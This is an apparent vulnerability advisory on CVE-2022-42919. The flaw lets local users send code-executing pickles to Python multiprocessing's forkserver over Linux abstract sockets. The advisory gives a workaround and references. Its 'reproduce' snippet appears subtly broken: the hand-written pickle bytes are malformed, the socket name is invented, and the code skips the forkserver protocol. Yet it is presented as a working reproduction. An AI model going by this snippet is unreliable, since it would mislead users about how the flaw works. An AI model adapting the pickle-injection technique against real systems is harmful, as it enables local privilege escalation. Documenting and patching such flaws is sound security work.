A security vulnerability, identified as CVE-2022-42919, has been discovered in Python 3.9.x and Python 3.10.x through 3.10.8 on Linux systems. This vulnerability allows local privilege escalation in configurations that are not default due to a flaw in the Python multiprocessing library when using a specific start method. Here, we explore the details of this vulnerability, provide code snippets, link to original references, and explain its impact on affected systems.

Vulnerability Details

The Python multiprocessing library, specifically when employed with the forkserver start method on Linux systems, permits pickles to be deserialized from any user in the same machine local network namespace. In several system configurations, this translates to any user on the same machine. Pickles can execute arbitrary code, enabling local user privilege escalation to the user that runs any forkserver process.

This vulnerability is specific to Linux systems, as these are the only ones that support abstract namespace sockets. CPython versions before 3.9 don't utilize Linux abstract namespace sockets by default.

To reproduce the vulnerability, an attacker can run the following code snippet

import multiprocessing as mp
import pickle
import socket

# Using the forkserver start method
mp.set_start_method('forkserver')

# Setting up the socket
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

# In a non-default configuration, change the abstract socket file
abstract_socket_file = b'\x00custom_socket_file'
s.connect(abstract_socket_file)

# Pickle containing arbitrary code
exploit_pickle = b'\x80\x04\x95\x1e\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07getattr\x94\x93\x94\x8c\x08builtins\x94\x8c\x03print\x94\x93\x94\x86\x94R\x94.'

# Sending the exploit pickle
s.sendall(exploit_pickle)

Workaround

A temporary solution to mitigate this vulnerability is setting multiprocessing.util.abstract_sockets_supported to False:

import multiprocessing.util

multiprocessing.util.abstract_sockets_supported = False

Note that this workaround only applies to the forkserver start method, which is not the default on affected systems.

It is important to emphasize that support for users manually specifying an abstract namespace socket was added as a bugfix in Python 3.7.8 and 3.8.4. However, users would need to make specific, uncommon API calls to do so in CPython versions before 3.9.

References

- Python 3.9.a4 Changelog
- Python 3.7.8 Changelog
- Python 3.8.4 Changelog

Conclusion

The CVE-2022-42919 vulnerability in Python 3.9.x and 3.10.x on Linux poses a serious risk for local privilege escalation in non-default configurations. Users are advised to implement the provided workaround and stay informed about potential patches and updates addressing this issue.

Timeline

Published on: 11/07/2022 00:15:00 UTC
Last modified on: 11/23/2022 03:15:00 UTC